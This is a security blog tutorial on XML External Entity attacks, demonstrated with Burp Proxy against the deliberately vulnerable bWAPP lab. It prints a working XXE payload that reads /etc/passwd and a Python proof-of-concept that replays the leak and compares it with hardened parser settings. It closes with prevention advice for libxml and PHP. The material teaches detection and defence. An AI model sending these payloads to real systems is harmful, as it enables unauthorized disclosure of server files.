The Lesser Known XE Attack

The Meaning

XE stands for XML Entity. XML itself is a standard for representing sets of data; entities are shortcuts to standard text or special characters: wherever the document says "&X;", the parser replaces it with the value declared for X.

An entity can be declared either internal or external.

An internal entity is defined in-line, like a macro. Its syntax looks like this: <!ENTITY entity-name "entity-value">.

An external entity points to data in an external file, like an import or include statement. Its syntax looks like this: <!ENTITY entity-name SYSTEM "URI/URL">.

The Idea

An XE attack is an attack on an application that parses XML input from untrusted sources with an incorrectly configured XML parser. It enables attackers to disclose resources on the system that are normally protected.

The idea behind the attack is that, when it parses the document, the parser resolves the entity's URI and substitutes the content it fetched for every reference to that entity. If the application then echoes the element back, the fetched content ends up in the response.

An XML application is easily identified by a declaration such as <?xml version="1.0"?> or by a body of nested tags such as <email><send> test </send></email>.

Demo Internal Entity Calls

For demonstration purposes, we will be using Burp Proxy to intercept and edit the request.

Access the webpage and click on ‘Forgot Password’ under the ‘Login’ button.

[Figure: Forgot Password]

Set up Burp Proxy to intercept the ‘Forgot Password’ request.

[Figure: intercepted request in Burp Proxy]

As the figure above shows, the application transmits data as XML, and Burp Proxy added an XML sub-tab for the request body.

Send the request to Repeater and observe the response. From the response we understand that the application processes XML, takes a certain input and returns it back.

[Figure: xml syntax]

To test whether the XML parser expands entities that we define in the request, we used the following XML; declaring a new entity of our own is the essential step:

<?xml version="1.0" encoding="utf-8"?>                <!-- XML declaration with the character encoding -->
<!DOCTYPE Header [                                     <!-- start of the inline DTD (internal subset) -->
<!ENTITY newentity "testing"> ]>                       <!-- declare an internal entity -->
<forgot><username>&newentity;</username></forgot>      <!-- reference the entity; the parser substitutes its value -->

[Figure: newentity]

As seen in the above request, we introduced an entity (newentity) within the request. The response shows that the XML parser parsed our declaration and echoed back the value we gave it. This confirms that the parser accepts a DTD supplied in the request and expands entities declared there; whether it also fetches external entities is checked next.

Exploiting XML External Entities

For exploitation we will be using the following:

  • Burp Proxy – to intercept and edit the request
  • Bee-Box – a custom Ubuntu Linux virtual machine (VM) with bWAPP pre-installed
  • bWAPP – a deliberately insecure, buggy web application

Start bWAPP on the bee-box VM and log in with the bee/bug credentials. Navigate to ‘Bug Hunt’, select ‘XML External Entity Attacks (XXE)’, click the ‘Hack’ button and the page below will display.

[Figure: any bugs button]

Set up Burp Proxy to intercept the ‘any bugs’ button request.

[Figure: intercepted request in Burp Proxy]

As the figure above shows, this application also transmits data as XML, and Burp Proxy again added an XML sub-tab for the request body.

Send the request to Repeater and observe the response. As the figure below shows, the application processes XML, takes a certain input and returns it back.

[Figure: change the value]

To get the contents of a file returned, we declare an external entity and change the value of the login parameter to &bWAPP; (an entity reference is the entity name between & and ;). The XML parser looks up the SYSTEM entity bWAPP and substitutes the content of the file it points to for the reference. The full request body is:

<?xml version="1.0" encoding="utf-8"?>                          <!-- XML declaration with the character encoding -->
<!DOCTYPE Header [                                               <!-- start of the inline DTD (internal subset) -->
<!ENTITY bWAPP SYSTEM "file:///etc/passwd"> ]>                   <!-- SYSTEM declares an external entity; the URI is the passwd file on the local system -->
<reset><login>&bWAPP;</login><secret>Anything</secret></reset>   <!-- the reference is replaced by the file contents -->

[Figure: local resource passwd file]

Checking the response in the figure above, we can see that the contents of the local /etc/passwd file were returned.

Preventing XE Attacks

XML Entity (XE) attacks can cause denial of service against local or remote systems, gain unauthorized access to files on the local machine, and allow scanning of remote machines from the server. As with any other injection attack, validating user input reduces the exposure.

However, it is rarely possible to validate the data that ends up in a system identifier (the URI in a SYSTEM declaration). The recommended fix is therefore to configure the XML processor to use a local static DTD and to disallow any DTD included in the XML document itself.

Where the parser cannot be told to ignore DTDs, setting its features for external general entities, external parameter entities and inline DTDs to false also prevents XML entity attacks. Rejecting a DOCTYPE altogether is the strongest setting, because both internal and external entities need one to be declared.
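The probe from ‘Demo Internal Entity Calls’, the file disclosure from ‘Exploiting XML External Entities’ and the hardened configuration recommended above, replayed against Python's standard-library SAX parser instead of bWAPP. This is an added example written for this page, not code from the original post or from bWAPP. The <reset><login> body and the entity names are the ones used in the post; the parser settings (feature_external_ges for external general entities, a lexical handler that refuses any DOCTYPE), the helper names (parse_login, probe_body, xxe_body, make_secret_file, run_demo) and the temporary stand-in for /etc/passwd with a constructed sample line are this example's own choices.

```python
"""XXE probe, exploit and hardened parser replayed on Python's stdlib SAX parser.
Added example for this page; not code from the original post or from bWAPP."""
import io
import pathlib
import tempfile
import xml.sax
from xml.sax import handler


class LoginCollector(handler.ContentHandler):
    """Collects the text inside <login>, the field bWAPP echoes back."""

    def __init__(self):
        super().__init__()
        self.chunks = []
        self._in_login = False

    def startElement(self, name, attrs):
        if name == "login":
            self._in_login = True

    def endElement(self, name):
        if name == "login":
            self._in_login = False

    def characters(self, content):
        if self._in_login:  # expat may deliver the text in several pieces
            self.chunks.append(content)


class DoctypeRejected(Exception):
    """Raised by the hardened parser as soon as a DOCTYPE is seen."""


class RejectDoctype:
    """SAX lexical handler: refuse any DOCTYPE, so the request body cannot
    declare entities at all (internal or external)."""

    def startDTD(self, name, public_id, system_id):
        raise DoctypeRejected(f"DOCTYPE {name!r} not allowed in request body")

    # remaining lexical callbacks that expatreader wires up; nothing to do
    def endDTD(self): pass
    def comment(self, content): pass
    def startCDATA(self): pass
    def endCDATA(self): pass


def parse_login(xml_bytes, resolve_external=False, reject_doctype=False):
    """Parse a <reset> body and return the text of <login>; resolve_external=True
    is the misconfigured parser, reject_doctype=True the hardened one."""
    parser = xml.sax.make_parser()
    # feature_external_ges: whether SYSTEM "file://..." entities are fetched
    parser.setFeature(handler.feature_external_ges, resolve_external)
    if reject_doctype:
        parser.setProperty(handler.property_lexical_handler, RejectDoctype())
    collector = LoginCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.chunks)


def probe_body(value="testing"):
    """Step 1 from the post: declare an internal entity and reference it."""
    return ('<?xml version="1.0" encoding="utf-8"?>\n'
            f'<!DOCTYPE reset [ <!ENTITY newentity "{value}"> ]>\n'
            '<reset><login>&newentity;</login><secret>Anything</secret></reset>').encode()


def xxe_body(uri):
    """Step 2 from the post: the entity now points at a local file."""
    return ('<?xml version="1.0" encoding="utf-8"?>\n'
            f'<!DOCTYPE reset [ <!ENTITY bWAPP SYSTEM "{uri}"> ]>\n'
            '<reset><login>&bWAPP;</login><secret>Anything</secret></reset>').encode()


def make_secret_file():
    """Constructed stand-in for /etc/passwd; returns (file:// URI, contents)."""
    content = "root:x:0:0:root:/root:/bin/bash"  # constructed sample line
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write(content)
    return pathlib.Path(fh.name).as_uri(), content


def run_demo():
    """Run every case once; returns what each parser configuration echoed."""
    uri, secret = make_secret_file()
    results = {
        "probe": parse_login(probe_body()),
        "vulnerable": parse_login(xxe_body(uri), resolve_external=True),
        "external_off": parse_login(xxe_body(uri)),
    }
    results["leaked"] = results["vulnerable"] == secret
    try:
        parse_login(xxe_body(uri), reject_doctype=True)
        results["doctype_rejected"] = False
    except DoctypeRejected:
        results["doctype_rejected"] = True
    return results


if __name__ == "__main__":
    for case, value in run_demo().items():
        print(f"{case}: {value!r}")
```

Run it as a script to see the cases side by side: the probe echoes "testing" in every configuration that still accepts a DOCTYPE, the file contents come back only when external general entities are switched on (the misconfiguration the prevention advice turns off), and with the feature off the parser silently drops the reference. Refusing the DOCTYPE is the stronger setting because it also blocks internal entities, and with them the entity-expansion denial-of-service variants.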

Considering the bWAPP application we exploited, we can review and modify its source code to make it more secure. The application is written in PHP and uses the libxml library for XML processing.

We can disable external entity loading in libxml with the function libxml_disable_entity_loader(), as shown below. Note that this function is deprecated since PHP 8.0: the libxml version PHP 8 requires (2.9.0 or later) no longer loads external entities unless the code asks for it, so the remaining risk there is a parser call that explicitly passes LIBXML_NOENT (substitute entities) or LIBXML_DTDLOAD (load the external DTD). Dropping those flags, or rejecting any request body that contains a DOCTYPE, closes the hole on every PHP version.

[Figure: libxml_disable_entity_loader() in the bWAPP source]

For other software platforms, refer to the detailed discussion on OWASP, which lists the attributes to disable in the various technologies.

https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing


Suleiman Farouk

Suleiman Farouk (CEH, CISC, CPFA, CPH, MCITP, MTA-Security) works as a Security Analyst at NII. He is an expert in the field of Vulnerability Assessment and Penetration Testing and is well versed in international standards such as OWASP and WASC. He is an active member of and speaker at the null/OWASP Mumbai Chapter meet.

